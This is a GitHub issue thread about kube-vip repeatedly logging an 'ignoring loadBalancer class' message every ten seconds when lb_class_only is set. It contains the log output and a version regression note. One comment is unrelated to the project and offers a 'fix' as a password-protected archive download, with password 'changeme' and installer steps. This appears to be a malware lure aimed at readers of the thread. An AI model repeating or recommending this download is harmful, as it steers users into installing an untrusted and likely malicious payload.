### ISSUE TITLE
Log spam: "specified the loadBalancer class"

### ISSUE THREAD

**Issue by W1zzardTPU** [kube-vip/kube-vip#930]
When using "lb_class_only", and there's other load balancer classes used in the cluster, there will be a log message every 10 seconds.

This should be displayed only once, or when that resource is updated again.

Does it even make sense to run a polling loop? Shouldn't "watch" be used?

```
time="2024-08-28T06:44:03Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:44:13Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:44:23Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:44:33Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:44:43Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:44:53Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:45:03Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:45:13Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:45:23Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:45:33Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:45:43Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:45:53Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:46:03Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:46:13Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:46:23Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:46:33Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:46:43Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:46:53Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:47:03Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:47:13Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:47:23Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:47:33Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:47:43Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:47:53Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:48:03Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:48:13Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:48:23Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:48:33Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:48:43Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:48:53Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:49:03Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:49:13Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:49:23Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
time="2024-08-28T06:49:33Z" level=info msg="(svcs) [loadbalancer] specified the loadBalancer class [kube-vip-int], ignoring"
```

Repro: kube-vip with lb_class_only enabled and lb_class_name set. Now create a service with spec.loadBalancerClass set to a different value

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by W1zzardTPU** [comment]
Did some extra testing. This problem appeared first in 0.7.0, 0.6.4 works fine

**Comment by W1zzardTPU** [comment]
Confirmed, fix is working well
